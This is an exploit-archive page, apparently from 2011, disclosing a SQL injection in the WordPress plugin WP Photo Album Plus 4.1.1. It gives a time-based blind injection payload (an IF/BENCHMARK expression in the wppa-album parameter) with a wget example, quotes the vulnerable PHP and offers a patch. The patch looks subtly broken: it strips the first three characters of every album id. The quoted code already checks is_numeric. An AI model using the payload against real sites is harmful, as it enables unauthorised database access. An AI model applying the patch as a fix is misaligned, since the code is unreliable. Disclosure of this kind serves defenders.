Home / exploitsPDF  

WordPress Photo Album Plus 4.1.1 SQL Injection

Posted on 15 October 2011

# Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
# Date: 2011-10-14
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
# Version: 4.1.1 (tested)

---------------
PoC (POST data)
---------------
http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1

e.g.

wget http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1

---------------
Vulnerable code
---------------
Line 490 of wppa-functions.php:
if (($occur == $ref_occur) && wppa_get_get('album')) {
$id = wppa_get_get('album');
$wppa['is_cover'] = wppa_get_get('cover');
}
...
...
if (is_numeric($id)) {
if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id);
else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id);
$albums = $wpdb->get_results($q, 'ARRAY_A');

Line 3170 of wppa-functions.php:
function wppa_get_get($index, $default = false) {
if (isset($_GET['wppa-'.$index])) {             // New syntax first
return $_GET['wppa-'.$index];
}
if (isset($_GET[$index])) {                             // Old syntax
return $_GET[$index];
}
return $default;
}

---------------
Patch
---------------

*** ./wppa-functions.php	2011-10-14 19:15:11.574775456 -0400
--- ./wppa-functions.php.new	2011-10-14 19:13:14.735784321 -0400
***************
*** 506,513 ****

// Top-level album has no cover
if ($id == '0') $wppa['is_cover'] = '0';
-
// Do the query
if (is_numeric($id)) {
if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id);
else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id);
--- 506,513 ----

// Top-level album has no cover
if ($id == '0') $wppa['is_cover'] = '0';
// Do the query
+ 		$id=substr($id,3);
if (is_numeric($id)) {
if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id);
else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id);
***************
*** 3384,3387 ****
global $wppa;

if ( $wppa['any'] ) echo $wppa['searchresults'];
! }
 No newline at end of file
--- 3384,3387 ----
global $wppa;

if ( $wppa['any'] ) echo $wppa['searchresults'];
! }

 

TOP

Malware :

Exploits :